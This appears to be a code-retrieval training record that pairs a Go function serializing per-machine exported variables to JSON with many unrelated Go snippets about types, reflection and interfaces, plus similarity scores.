[]reflect.Type{outType.Elem()}, false)\n\n\t\treturn reflect.MakeFunc(ctype, func(args []reflect.Value) (results []reflect.Value) {\n\t\t\tout := reflect.New(outType.Elem())\n\t\t\tout.Elem().Set(reflect.ValueOf(in))\n\n\t\t\treturn []reflect.Value{out.Elem()}\n\t\t}).Interface()\n\t}\n\n\tinType := reflect.TypeOf(in)\n\n\tins := make([]reflect.Type, inType.NumIn())\n\touts := make([]reflect.Type, inType.NumOut())\n\n\tfor i := range ins {\n\t\tins[i] = inType.In(i)\n\t}\n\touts[0] = outType.Elem()\n\tfor i := range outs[1:] {\n\t\touts[i+1] = inType.Out(i + 1)\n\t}\n\n\tctype := reflect.FuncOf(ins, outs, false)\n\n\treturn reflect.MakeFunc(ctype, func(args []reflect.Value) (results []reflect.Value) {\n\t\touts := reflect.ValueOf(in).Call(args)\n\n\t\tout := reflect.New(outType.Elem())\n\t\tif outs[0].Type().AssignableTo(outType.Elem()) {\n\t\t\t// Out: Iface = In: *Struct; Out: Iface = In: OtherIface\n\t\t\tout.Elem().Set(outs[0])\n\t\t} else {\n\t\t\t// Out: Iface = &(In: Struct)\n\t\t\tt := reflect.New(outs[0].Type())\n\t\t\tt.Elem().Set(outs[0])\n\t\t\tout.Elem().Set(t)\n\t\t}\n\t\touts[0] = out.Elem()\n\n\t\treturn outs\n\t}).Interface()\n}", "func (e *Wildcard) Type() Type {\n\treturn UnknownType\n}", "func convertToStarlark(it interface{}) (starlark.Value, error) {\n\tswitch x := it.(type) {\n\tcase int:\n\t\treturn starlark.MakeInt(x), nil\n\tcase float64:\n\t\treturn starlark.Float(x), nil\n\tcase string:\n\t\treturn starlark.String(x), nil\n\tdefault:\n\t\treturn starlark.None, fmt.Errorf(\"unknown type of %v\", reflect.TypeOf(it))\n\t}\n}", "func Classification(t interface{}) interface{} {\n\td := t.(Datum)\n\treturn d.Species\n}", "func switchWithDataTypes()(){\n getInterfaceDatatype := func(i interface{}) {\n switch t := i.(type) {\n case bool:\n fmt.Println(\"I'm a bool\")\n case int:\n fmt.Println(\"I'm an int\")\n default:\n fmt.Printf(\"Don't know type %T\\n\", t)\n }\n }\n getInterfaceDatatype(true)\n getInterfaceDatatype(1)\n getInterfaceDatatype(\"hey\")\n getInterfaceDatatype(2.0)\n}", "func (m VipType) Pointer() *VipType {\n\treturn &m\n}", "func (m *RecurrencePattern) SetType(value *RecurrencePatternType)() {\n m.type_escaped = value\n}", "func (*NamedType) isType() {}", "func resetType(inst value.Value) {\n\tswitch inst := inst.(type) {\n\t// Unary instructions\n\tcase *ir.InstFNeg:\n\t\tinst.Typ = nil\n\t// Binary instructions\n\tcase *ir.InstAdd:\n\t\tinst.Typ = nil\n\tcase *ir.InstFAdd:\n\t\tinst.Typ = nil\n\tcase *ir.InstSub:\n\t\tinst.Typ = nil\n\tcase *ir.InstFSub:\n\t\tinst.Typ = nil\n\tcase *ir.InstMul:\n\t\tinst.Typ = nil\n\tcase *ir.InstFMul:\n\t\tinst.Typ = nil\n\tcase *ir.InstUDiv:\n\t\tinst.Typ = nil\n\tcase *ir.InstSDiv:\n\t\tinst.Typ = nil\n\tcase *ir.InstFDiv:\n\t\tinst.Typ = nil\n\tcase *ir.InstURem:\n\t\tinst.Typ = nil\n\tcase *ir.InstSRem:\n\t\tinst.Typ = nil\n\tcase *ir.InstFRem:\n\t\tinst.Typ = nil\n\t// Bitwise instructions\n\tcase *ir.InstShl:\n\t\tinst.Typ = nil\n\tcase *ir.InstLShr:\n\t\tinst.Typ = nil\n\tcase *ir.InstAShr:\n\t\tinst.Typ = nil\n\tcase *ir.InstAnd:\n\t\tinst.Typ = nil\n\tcase *ir.InstOr:\n\t\tinst.Typ = nil\n\tcase *ir.InstXor:\n\t\tinst.Typ = nil\n\t// Vector instructions\n\tcase *ir.InstExtractElement:\n\t\tinst.Typ = nil\n\tcase *ir.InstInsertElement:\n\t\tinst.Typ = nil\n\tcase *ir.InstShuffleVector:\n\t\tinst.Typ = nil\n\t// Aggregate instructions\n\tcase *ir.InstExtractValue:\n\t\tinst.Typ = nil\n\tcase *ir.InstInsertValue:\n\t\tinst.Typ = nil\n\t// Memory instructions\n\tcase *ir.InstAlloca:\n\t\tinst.Typ = nil\n\tcase *ir.InstLoad:\n\t\t// type not cached.\n\tcase *ir.InstCmpXchg:\n\t\tinst.Typ = nil\n\tcase *ir.InstAtomicRMW:\n\t\tinst.Typ = nil\n\tcase *ir.InstGetElementPtr:\n\t\tinst.Typ = nil\n\t// Conversion instructions\n\tcase *ir.InstTrunc:\n\t\t// type not cached.\n\tcase *ir.InstZExt:\n\t\t// type not cached.\n\tcase *ir.InstSExt:\n\t\t// type not cached.\n\tcase *ir.InstFPTrunc:\n\t\t// type not cached.\n\tcase *ir.InstFPExt:\n\t\t// type not cached.\n\tcase *ir.InstFPToUI:\n\t\t// type not cached.\n\tcase *ir.InstFPToSI:\n\t\t// type not cached.\n\tcase *ir.InstUIToFP:\n\t\t// type not cached.\n\tcase *ir.InstSIToFP:\n\t\t// type not cached.\n\tcase *ir.InstPtrToInt:\n\t\t// type not cached.\n\tcase *ir.InstIntToPtr:\n\t\t// type not cached.\n\tcase *ir.InstBitCast:\n\t\t// type not cached.\n\tcase *ir.InstAddrSpaceCast:\n\t\t// type not cached.\n\t// Other instructions\n\tcase *ir.InstICmp:\n\t\tinst.Typ = nil\n\tcase *ir.InstFCmp:\n\t\tinst.Typ = nil\n\tcase *ir.InstPhi:\n\t\tinst.Typ = nil\n\tcase *ir.InstSelect:\n\t\tinst.Typ = nil\n\tcase *ir.InstCall:\n\t\tinst.Typ = nil\n\tcase *ir.InstVAArg:\n\t\t// type not cached.\n\tcase *ir.InstLandingPad:\n\t\t// type not cached.\n\tcase *ir.InstCatchPad:\n\t\t// type not cached.\n\tcase *ir.InstCleanupPad:\n\t\t// type not cached.\n\tdefault:\n\t\tpanic(fmt.Errorf(\"support for instruction type %T not yet implemented\", inst))\n\t}\n}", "func (a *Animal) Eat() {\r\n\tfmt.Println(a.food)\r\n}", "func (f *animalFactory) SetFactory(newFactory func(string, int, float32) ICat) {\n\tmutex.Lock()\n\tf.createAnimalFactoryPtr = newFactory\n\tmutex.Unlock()\n}", "func _(s struct{A0}) { s.A0 = x0 }", "func Decode(data interface{}, ptr interface{}) {\n v := Value{data}\n v.Decode(ptr)\n}", "func NewType() Type {}", "func ToPointer[T any](val T) *T {\n\treturn &val\n}", "func (t *Type) MapType() *MapType", "func (m *User) SetEmployeeType(value *string)() {\n m.employeeType = value\n}", "func _[T interface{ ~int }](x T) {\n\tvar _ int = int(x)\n\tvar _ T = 42\n\tvar _ T = T(myint(42))\n}", "func castToType(v interface{}, typ influxql.DataType) interface{} {\n\tswitch typ {\n\tcase influxql.Float:\n\t\tif val, ok := castToFloat(v); ok {\n\t\t\tv = val\n\t\t}\n\tcase influxql.Integer:\n\t\tif val, ok := castToInteger(v); ok {\n\t\t\tv = val\n\t\t}\n\tcase influxql.Unsigned:\n\t\tif val, ok := castToUnsigned(v); ok {\n\t\t\tv = val\n\t\t}\n\tcase influxql.String, influxql.Tag:\n\t\tif val, ok := castToString(v); ok {\n\t\t\tv = val\n\t\t}\n\tcase influxql.Boolean:\n\t\tif val, ok := castToBoolean(v); ok {\n\t\t\tv = val\n\t\t}\n\t}\n\treturn v\n}", "func (m *Module) typeDef(old *ast.NamedType) {\n\ttyp := m.getType(old.Name)\n\tdef := m.irType(old.Def)\n\tswitch typ := typ.(type) {\n\tcase *types.VoidType:\n\t\t_, ok := def.(*types.VoidType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.VoidType, got %T\", def))\n\t\t}\n\t\t// nothing to do.\n\tcase *types.FuncType:\n\t\td, ok := def.(*types.FuncType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.FuncType, got %T\", def))\n\t\t}\n\t\ttyp.Ret = d.Ret\n\t\ttyp.Params = d.Params\n\t\ttyp.Variadic = d.Variadic\n\tcase *types.IntType:\n\t\td, ok := def.(*types.IntType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.IntType, got %T\", def))\n\t\t}\n\t\ttyp.Size = d.Size\n\tcase *types.FloatType:\n\t\td, ok := def.(*types.FloatType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.FloatType, got %T\", def))\n\t\t}\n\t\ttyp.Kind = d.Kind\n\tcase *types.PointerType:\n\t\td, ok := def.(*types.PointerType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.PointerType, got %T\", def))\n\t\t}\n\t\ttyp.Elem = d.Elem\n\t\ttyp.AddrSpace = d.AddrSpace\n\tcase *types.VectorType:\n\t\td, ok := def.(*types.VectorType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.VectorType, got %T\", def))\n\t\t}\n\t\ttyp.Elem = d.Elem\n\t\ttyp.Len = d.Len\n\tcase *types.LabelType:\n\t\t_, ok := def.(*types.LabelType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.LabelType, got %T\", def))\n\t\t}\n\t\t// nothing to do.\n\tcase *types.MetadataType:\n\t\t_, ok := def.(*types.MetadataType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.MetadataType, got %T\", def))\n\t\t}\n\t\t// nothing to do.\n\tcase *types.ArrayType:\n\t\td, ok := def.(*types.ArrayType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.ArrayType, got %T\", def))\n\t\t}\n\t\ttyp.Elem = d.Elem\n\t\ttyp.Len = d.Len\n\tcase *types.StructType:\n\t\td, ok := def.(*types.StructType)\n\t\tif !ok {\n\t\t\tpanic(fmt.Errorf(\"invalid type; expected *types.StructType, got %T\", def))\n\t\t}\n\t\ttyp.Fields = d.Fields\n\t\ttyp.Opaque = d.Opaque\n\tdefault:\n\t\tpanic(fmt.Errorf(\"support for type %T not yet implemented\", typ))\n\t}\n}", "func main() {\n\tanimals := []Animal{&Dog{}, &Cat{}, &Programmer{}}\n\tfor _, name := range animals {\n\t\tfmt.Println(name)\n\t\tfmt.Println(name.speak())\n\t}\n}", "func (j *JDbg) assignable(dst Type, val interface{}) bool {\n\tif v, ok := val.(Value); ok {\n\t\tif v.ty.CastableTo(dst) {\n\t\t\treturn true\n\t\t}\n\t\tif dst.Signature() == v.ty.Signature() {\n\t\t\t// Sanity check.\n\t\t\tpanic(fmt.Sprint(\"Two different types found with identical signatures! \", dst.Signature()))\n\t\t}\n\t\treturn j.assignable(dst, v.val)\n\t}\n\treturn j.assignableT(dst, reflect.TypeOf(val))\n}", "func (self *TileSprite) SetHealA(member interface{}) {\n self.Object.Set(\"heal\", member)\n}", "func walkAssignDotType(n *ir.AssignListStmt, init *ir.Nodes) ir.Node {\n\twalkExprListSafe(n.Lhs, init)\n\tn.Rhs[0] = walkExpr(n.Rhs[0], init)\n\treturn n\n}", "func AnyPtr(v interface{}) interface{} {\n\tr := reflect.New(reflect.TypeOf(v))\n\treflect.ValueOf(r.Interface()).Elem().Set(reflect.ValueOf(v))\n\treturn r.Interface()\n}", "func dontChangeMe(p animal) {\n\n\tp.name = \"New name\"\n\tp.age = 99\n}", "func new_(e interface{}) func() Event {\n\ttyp := reflect.TypeOf(e)\n\treturn func() Event {\n\t\treturn reflect.New(typ).Interface().(Event)\n\t}\n}", "func (self *TileSprite) SetDamageA(member interface{}) {\n self.Object.Set(\"damage\", member)\n}", "func (i *InterfaceFuzzer) OverrideType(typeName string, factory func() interface{}) {\n\ti.typeOverrides[typeName] = factory\n}", "func MakeAny(val interface{}) *Any {\n\treturn &Any{val, nil, nil}\n}", "func ptr(obj MilpaObject) MilpaObject {\n\tv := reflect.ValueOf(obj)\n\tif v.Kind() == reflect.Ptr {\n\t\treturn obj\n\t}\n\tv2 := reflect.New(v.Type())\n\tv2.Elem().Set(v)\n\treturn v2.Interface().(MilpaObject)\n}", "func (ExprType) AssignableTo(typ string) bool { return boolResult }", "func elemof(t reflect.Type) reflect.Type {\n\tfor t.Kind() == reflect.Ptr {\n\t\tt = t.Elem()\n\t}\n\treturn t\n}", "func SwitchOnType(x interface{}) {\n\tswitch x.(type) { // this is an assert; asserting, \"x is of this type\"\n\t\tcase int:\n\t\t\tfmt.Println(\"int\")\n\t\tcase string:\n\t\t\tfmt.Println(\"string\")\n\t\tcase contact:\n\t\t\tfmt.Println(\"contact\")\n\t\tdefault:\n\t\t\tfmt.Println(\"unknown\")\n\t}\n}", "func (s *BaseDMLListener) EnterPatternType(ctx *PatternTypeContext) {}", "func (m ApplicationType) Pointer() *ApplicationType {\n\treturn &m\n}", "func idPointer(id interface{}) (p *interface{}) {\n\tif id != nil {\n\t\tp = &id\n\t}\n\treturn\n}", "func (l *loader) load(n node, t interface{}) error {\n\n\t// only pointers can be set to new values by the loader.\n\tif reflect.TypeOf(t).Kind() != reflect.Ptr {\n\t\treturn fmt.Errorf(\"load() must be called with a pointer\")\n\t}\n\n\t// get the reflected type of the loader in order to look up\n\t// handler methods, e.g. loader.MappingToWorkflowInput()\n\tloaderTyp := reflect.TypeOf(l)\n\tloaderVal := reflect.ValueOf(l)\n\n\t// reflect the type and value of the destination.\n\ttyp := reflect.TypeOf(t).Elem()\n\tval := reflect.ValueOf(t).Elem()\n\n\t// get string version of the yaml node type\n\t// for building the handler name.\n\tnodeKind := \"unknown\"\n\tswitch n.Kind {\n\tcase yamlast.MappingNode:\n\t\tnodeKind = \"Mapping\"\n\tcase yamlast.SequenceNode:\n\t\tnodeKind = \"Seq\"\n\tcase yamlast.ScalarNode:\n\t\tnodeKind = \"Scalar\"\n\tdefault:\n\t\tpanic(\"unknown node kind\")\n\t}\n\n\t// describes the type conversion being requested,\n\t// in order to look up a registered handler.\n\ttypename := strings.Title(typ.Name())\n\tif typ.Kind() == reflect.Slice {\n\t\ttypename = strings.Title(typ.Elem().Name())\n\t\ttypename += \"Slice\"\n\t}\n\tif typ.Kind() == reflect.Map {\n\t\ttypename = strings.Title(typ.Elem().Name())\n\t\ttypename += \"Map\"\n\t}\n\thandlerName := nodeKind + \"To\" + typename\n\n\t// look for a handler. if found, use it.\n\tif _, ok := loaderTyp.MethodByName(handlerName); ok {\n\t\tm := loaderVal.MethodByName(handlerName)\n\t\tnval := reflect.ValueOf(n)\n\t\toutv := m.Call([]reflect.Value{nval})\n\t\terrv := outv[1]\n\t\tif !errv.IsNil() {\n\t\t\treturn errv.Interface().(error)\n\t\t}\n\t\tresv := outv[0]\n\t\tval.Set(resv)\n\t\treturn nil\n\t}\n\n\tswitch {\n\t// Try to handle obvious scalar conversions automatically.\n\tcase n.Kind == yamlast.ScalarNode:\n\t\tvt := reflect.TypeOf(n.Value)\n\n\t\tif vt.AssignableTo(typ) {\n\t\t\tval.Set(reflect.ValueOf(n.Value))\n\t\t\treturn nil\n\t\t} else if vt.ConvertibleTo(typ) {\n\t\t\tval.Set(reflect.ValueOf(n.Value).Convert(typ))\n\t\t\treturn nil\n\t\t} else {\n\t\t\terr := coerceSet(t, n.Value)\n\t\t\tif err == nil {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t// Try to automatically load a YAML mapping into a struct.\n\tcase typ.Kind() == reflect.Struct && n.Kind == yamlast.MappingNode:\n\t\treturn l.loadMappingToStruct(n, t)\n\n\t\t// Try to automatically load a YAML sequence into a slice type,\n\t\t// without a defined handler.\n\tcase typ.Kind() == reflect.Slice && n.Kind == yamlast.SequenceNode:\n\t\tfor _, c := range n.Children {\n\t\t\tel := typ.Elem()\n\t\t\tif el.Kind() == reflect.Ptr {\n\t\t\t\tel = el.Elem()\n\t\t\t}\n\n\t\t\titem := reflect.New(el)\n\t\t\terr := l.load(c, item.Interface())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tif typ.Elem().Kind() == reflect.Ptr {\n\t\t\t\tval.Set(reflect.Append(val, item))\n\t\t\t} else {\n\t\t\t\tval.Set(reflect.Append(val, item.Elem()))\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\t// No handler found.\n\treturn fmt.Errorf(\"unhandled type at line %d, col %d. looking for %s\", n.Line+1, n.Column+1, handlerName)\n}", "func SwitchOnType(value interface{}) {\n\n\tswitch value.(type) {\n\tcase int:\n\t\tfmt.Println(\"int\")\n\tcase float64:\n\t\tfmt.Println(\"float\")\n\tdefault:\n\t\tfmt.Println(\"unknown type\")\n\n\t}\n}", "func (b *node) MutateType(t NodeType) {\n\treturn\n}", "func FolderDetailsTypePtr(in FolderDetailsType) *FolderDetailsType { return &in }", "func (self *TileSprite) Heal() interface{}{\n return self.Object.Get(\"heal\")\n}", "func AnimalFromString(str string) Animal {\n\tswitch str {\n\tcase animalStringZebra:\n\t\treturn AnimalZebra\n\tcase animalStringGiraffe:\n\t\treturn AnimalGiraffe\n\tcase animalStringCoyote:\n\t\treturn AnimalCoyote\n\tdefault:\n\t\treturn AnimalUnknown\n\t}\n}", "func Simsimtype(t *Type) EType", "func convertToStarlark(it interface{}) (starlark.Value, error) {\n\tswitch x := it.(type) {\n\tcase int:\n\t\treturn starlark.MakeInt(x), nil\n\tcase bool:\n\t\tif x {\n\t\t\treturn starlark.True, nil\n\t\t}\n\t\treturn starlark.False, nil\n\tcase float64:\n\t\treturn starlark.Float(x), nil\n\tcase string:\n\t\treturn starlark.String(x), nil\n\tdefault:\n\t\treturn starlark.None, fmt.Errorf(\"unknown type of %v\", reflect.TypeOf(it))\n\t}\n}", "func NewAny(p interface{}) *any.Any {\n\tt, v := arch.EncodeType(p)\n\treturn &any.Any{\n\t\tTypeUrl: t,\n\t\tValue: v,\n\t}\n}", "func (s *BasePlSqlParserListener) EnterSubtype_declaration(ctx *Subtype_declarationContext) {}", "func (y *YangType) typedef() *Typedef {\n\treturn &Typedef{\n\t\tName: y.Name,\n\t\tSource: &Statement{},\n\t\tType: &Type{\n\t\t\tName: y.Name,\n\t\t\tSource: &Statement{},\n\t\t\tYangType: y,\n\t\t},\n\t\tYangType: y,\n\t}\n}", "func (n NetworkTypeOther) construct() NetworkTypeClass { return &n }", "func bar(h human) {\n\n\t//h can be person type or secretAgent\n\tswitch h.(type) {\n\tcase person:\n\t\tfmt.Println(\"I was passed into barrrrrr\", h.(person).first)\n\tcase secretAgent:\n\t\tfmt.Println(\"I was passed into barrrrrr\", h.(secretAgent).person.first)\n\t}\n\tfmt.Println(\"I was passed into bar\", h)\n}", "func printType(anything interface{}) {\n\tfmt.Printf(\"Type: %T Value: %v\\n\", anything, anything)\n}", "func (m DiskType) Pointer() *DiskType {\n\treturn &m\n}", "func (a *Animal) Move() {\r\n\tfmt.Println(a.locomotion)\r\n}", "func (a *AdditionalGUTI) SetTypeOfIdentity(typeOfIdentity uint8) {}", "func (s *BasePlSqlParserListener) EnterDatatype(ctx *DatatypeContext) {}", "func assignop(src *types.Type, dst *types.Type, why *string) Op {\n\tif why != nil {\n\t\t*why = \"\"\n\t}\n\n\tif src == dst {\n\t\treturn OCONVNOP\n\t}\n\tif src == nil || dst == nil || src.Etype == TFORW || dst.Etype == TFORW || src.Orig == nil || dst.Orig == nil {\n\t\treturn 0\n\t}\n\n\t// 1. src type is identical to dst.\n\tif types.Identical(src, dst) {\n\t\treturn OCONVNOP\n\t}\n\n\t// 2. src and dst have identical underlying types\n\t// and either src or dst is not a named type or\n\t// both are empty interface types.\n\t// For assignable but different non-empty interface types,\n\t// we want to recompute the itab. Recomputing the itab ensures\n\t// that itabs are unique (thus an interface with a compile-time\n\t// type I has an itab with interface type I).\n\tif types.Identical(src.Orig, dst.Orig) {\n\t\tif src.IsEmptyInterface() {\n\t\t\t// Conversion between two empty interfaces\n\t\t\t// requires no code.\n\t\t\treturn OCONVNOP\n\t\t}\n\t\tif (src.Sym == nil || dst.Sym == nil) && !src.IsInterface() {\n\t\t\t// Conversion between two types, at least one unnamed,\n\t\t\t// needs no conversion. The exception is nonempty interfaces\n\t\t\t// which need to have their itab updated.\n\t\t\treturn OCONVNOP\n\t\t}\n\t}\n\n\t// 3. dst is an interface type and src implements dst.\n\tif dst.IsInterface() && src.Etype != TNIL {\n\t\tvar missing, have *types.Field\n\t\tvar ptr int\n\t\tif implements(src, dst, &missing, &have, &ptr) {\n\t\t\treturn OCONVIFACE\n\t\t}\n\n\t\t// we'll have complained about this method anyway, suppress spurious messages.\n\t\tif have != nil && have.Sym == missing.Sym && (have.Type.Broke() || missing.Type.Broke()) {\n\t\t\treturn OCONVIFACE\n\t\t}\n\n\t\tif why != nil {\n\t\t\tif isptrto(src, TINTER) {\n\t\t\t\t*why = fmt.Sprintf(\":\\n\\t%v is pointer to interface, not interface\", src)\n\t\t\t} else if have != nil && have.Sym == missing.Sym && have.Nointerface() {\n\t\t\t\t*why = fmt.Sprintf(\":\\n\\t%v does not implement %v (%v method is marked 'nointerface')\", src, dst, missing.Sym)\n\t\t\t} else if have != nil && have.Sym == missing.Sym {\n\t\t\t\t*why = fmt.Sprintf(\":\\n\\t%v does not implement %v (wrong type for %v method)\\n\"+\n\t\t\t\t\t\"\\t\\thave %v%0S\\n\\t\\twant %v%0S\", src, dst, missing.Sym, have.Sym, have.Type, missing.Sym, missing.Type)\n\t\t\t} else if ptr != 0 {\n\t\t\t\t*why = fmt.Sprintf(\":\\n\\t%v does not implement %v (%v method has pointer receiver)\", src, dst, missing.Sym)\n\t\t\t} else if have != nil {\n\t\t\t\t*why = fmt.Sprintf(\":\\n\\t%v does not implement %v (missing %v method)\\n\"+\n\t\t\t\t\t\"\\t\\thave %v%0S\\n\\t\\twant %v%0S\", src, dst, missing.Sym, have.Sym, have.Type, missing.Sym, missing.Type)\n\t\t\t} else {\n\t\t\t\t*why = fmt.Sprintf(\":\\n\\t%v does not implement %v (missing %v method)\", src, dst, missing.Sym)\n\t\t\t}\n\t\t}\n\n\t\treturn 0\n\t}\n\n\tif isptrto(dst, TINTER) {\n\t\tif why != nil {\n\t\t\t*why = fmt.Sprintf(\":\\n\\t%v is pointer to interface, not interface\", dst)\n\t\t}\n\t\treturn 0\n\t}\n\n\tif src.IsInterface() && dst.Etype != TBLANK {\n\t\tvar missing, have *types.Field\n\t\tvar ptr int\n\t\tif why != nil && implements(dst, src, &missing, &have, &ptr) {\n\t\t\t*why = \": need type assertion\"\n\t\t}\n\t\treturn 0\n\t}\n\n\t// 4. src is a bidirectional channel value, dst is a channel type,\n\t// src and dst have identical element types, and\n\t// either src or dst is not a named type.\n\tif src.IsChan() && src.ChanDir() == types.Cboth && dst.IsChan() {\n\t\tif types.Identical(src.Elem(), dst.Elem()) && (src.Sym == nil || dst.Sym == nil) {\n\t\t\treturn OCONVNOP\n\t\t}\n\t}\n\n\t// 5. src is the predeclared identifier nil and dst is a nillable type.\n\tif src.Etype == TNIL {\n\t\tswitch dst.Etype {\n\t\tcase TPTR,\n\t\t\tTFUNC,\n\t\t\tTMAP,\n\t\t\tTCHAN,\n\t\t\tTINTER,\n\t\t\tTSLICE:\n\t\t\treturn OCONVNOP\n\t\t}\n\t}\n\n\t// 6. rule about untyped constants - already converted by defaultlit.\n\n\t// 7. Any typed value can be assigned to the blank identifier.\n\tif dst.Etype == TBLANK {\n\t\treturn OCONVNOP\n\t}\n\n\treturn 0\n}", "func FromPointer[T any, TT *T](val *T) (zero T) {\n\tif val == nil {\n\t\treturn zero\n\t}\n\treturn *val\n}", "func newVar(v interface{}) (*interface{}, error) {\n\tx := interface{}(v)\n\treturn &x, nil\n}", "func (t *Type) IsPtr() bool", "func _[T interface{ ~*int }](p T) int {\n\treturn *p\n}", "func (v SimpleType) Ptr() *SimpleType {\n\treturn &v\n}", "func gen(typ interface{}, rand *rand.Rand) interface{} {\n\tv, ok := quick.Value(reflect.TypeOf(typ), rand)\n\tif !ok {\n\t\tpanic(fmt.Sprintf(\"couldn't generate random value of type %T\", typ))\n\t}\n\treturn v.Interface()\n}", "func (t *Type) DDDField() *Type", "func (*UnresolvedName) Variable() {}" ]
[ "0.5114861", "0.51113284", "0.49268", "0.49163157", "0.4887236", "0.48607418", "0.48569608", "0.48247755", "0.48227924", "0.480046", "0.4782768", "0.47612518", "0.47552758", "0.47128573", "0.46864012", "0.46732143", "0.46424517", "0.46148306", "0.46060798", "0.45969677", "0.45809233", "0.45714682", "0.4565142", "0.45453963", "0.45412466", "0.45324308", "0.4529657", "0.4501718", "0.4492117", "0.44682264", "0.44546035", "0.44524422", "0.44479892", "0.44416255", "0.4441567", "0.44288674", "0.4413113", "0.44105065", "0.43941918", "0.43900728", "0.43887877", "0.4364667", "0.43632656", "0.43594778", "0.4355781", "0.4355589", "0.4343887", "0.4343101", "0.43379802", "0.4328697", "0.4328485", "0.43276986", "0.4322897", "0.43127", "0.430764", "0.42774993", "0.4276395", "0.42642573", "0.42585322", "0.42463222", "0.4241389", "0.42378306", "0.4237687", "0.42376766", "0.42313796", "0.42268237", "0.42246628", "0.42015454", "0.41991642", "0.4189979", "0.41806", "0.4179653", "0.4172105", "0.41706347", "0.41670015", "0.41658714", "0.4162751", "0.41596657", "0.41589844", "0.41559088", "0.41547838", "0.4150639", "0.41480926", "0.41349298", "0.4131812", "0.4130542", "0.41300425", "0.41282427", "0.41233903", "0.41233334", "0.41219392", "0.41054228", "0.41028184", "0.41018698", "0.41018292", "0.40996668", "0.4099232", "0.4097436", "0.40960515", "0.40959895", "0.4095632" ]
0.0
-1
String returns a JSONformatted string representing the exported variables of all underlying machines. TODO(marius): aggregate values too?
func (v machineVars) String() string { ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) defer cancel() g, ctx := errgroup.WithContext(ctx) var ( mu sync.Mutex vars = make(map[string]Expvars) ) for _, m := range v.B.Machines() { // Only propagate stats for machines we own, otherwise we can // create stats loops. if !m.Owned() { continue } m := m g.Go(func() error { var mvars Expvars if err := m.Call(ctx, "Supervisor.Expvars", struct{}{}, &mvars); err != nil { log.Error.Printf("failed to retrieve variables for %s: %v", m.Addr, err) return nil } mu.Lock() vars[m.Addr] = mvars mu.Unlock() return nil }) } if err := g.Wait(); err != nil { b, err2 := json.Marshal(err.Error()) if err2 != nil { log.Error.Printf("machineVars marshal: %v", err2) return `"error"` } return string(b) } b, err := json.Marshal(vars) if err != nil { log.Error.Printf("machineVars marshal: %v", err) return `"error"` } return string(b) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (v varExporter) String() string {\n\tout := map[string]probeInfo{}\n\n\tv.p.mu.Lock()\n\tprobes := make([]*Probe, 0, len(v.p.probes))\n\tfor _, probe := range v.p.probes {\n\t\tprobes = append(probes, probe)\n\t}\n\tv.p.mu.Unlock()\n\n\tfor _, probe := range probes {\n\t\tprobe.mu.Lock()\n\t\tinf := probeInfo{\n\t\t\tLabels: probe.labels,\n\t\t\tStart: probe.start,\n\t\t\tEnd: probe.end,\n\t\t\tResult: probe.result,\n\t\t}\n\t\tif probe.end.After(probe.start) {\n\t\t\tinf.Latency = probe.end.Sub(probe.start).String()\n\t\t}\n\t\tout[probe.name] = inf\n\t\tprobe.mu.Unlock()\n\t}\n\n\tbs, err := json.Marshal(out)\n\tif err != nil {\n\t\treturn fmt.Sprintf(`{\"error\": %q}`, err)\n\t}\n\treturn string(bs)\n}", "func (environment *Environment) String() string {\n\tmarshaledVal, _ := json.MarshalIndent(*environment, \"\", \" \") // Marshal to JSON\n\n\treturn string(marshaledVal) // Return string value\n}", "func (tm *TuringMachine) ToJSONString() string {\n\tvar jsonBuf, err = json.MarshalIndent(tm, \"\", \" \")\n\tif err != nil {\n\t\tlog.Fatalf(\"Error: Turing Machine JSON Marshal err: %v\\n\", err)\n\t}\n\treturn string(jsonBuf)\n}", "func (m *varMap) String() string {\n\tbs := []byte{}\n\tfor k, v := range m.vars {\n\t\tbs = append(bs, '\\t')\n\t\tbs = append(bs, k...)\n\t\tbs = append(bs, ':')\n\t\tbs = append(bs, ' ')\n\t\ts := v.String()\n\t\tbs = append(bs, strings.Replace(s, \"\\n\", \"\\n\\t\\t\", -1)...)\n\t\tbs = append(bs, '\\n')\n\t}\n\treturn *(*string)(unsafe.Pointer(&bs))\n}", "func (r *Registry) String() string {\n\tout := make([]string, 0, len(r.nameToObject))\n\tfor name, object := range r.nameToObject {\n\t\tout = append(out, fmt.Sprintf(\"* %s:\\n%s\", name, object.serialization))\n\t}\n\treturn strings.Join(out, \"\\n\\n\")\n}", "func (self *monitoringData) String() string {\n\tstr, _ := self.JSON()\n\treturn str\n}", "func (e ExternalCfps) String() string {\n\tje, _ := json.Marshal(e)\n\treturn string(je)\n}", "func (h *Host) String() string {\n\t// Errors only occur for non-UTF8 characters in strings or unmarshalable types (which we don't have).\n\tb, _ := json.MarshalIndent(h, \"\", \" \")\n\treturn string(b)\n}", "func (t Technologies) String() string {\n\tjt, _ := json.Marshal(t)\n\treturn string(jt)\n}", "func (o *Createperformanceprofile) String() string {\n \n \n \n o.ReportingIntervals = []Reportinginterval{{}} \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (h *Host) JSON() []byte {\n\tb, _ := json.MarshalIndent(h, \"\", \" \")\n\treturn b\n}", "func (arr *varArray) String() string {\n\treturn fmt.Sprint(arr.vars)\n}", "func (s *Switch) To_json( ) ( jstr string ) {\n\tvar sep = \"\"\n\n\tif s == nil {\n\t\tjstr = `{ id: \"null_switch\" }`\n\t\treturn\n\t}\n\n\tif s.lidx > 0 {\n\t\tjstr = fmt.Sprintf( `{ \"id\": %q, 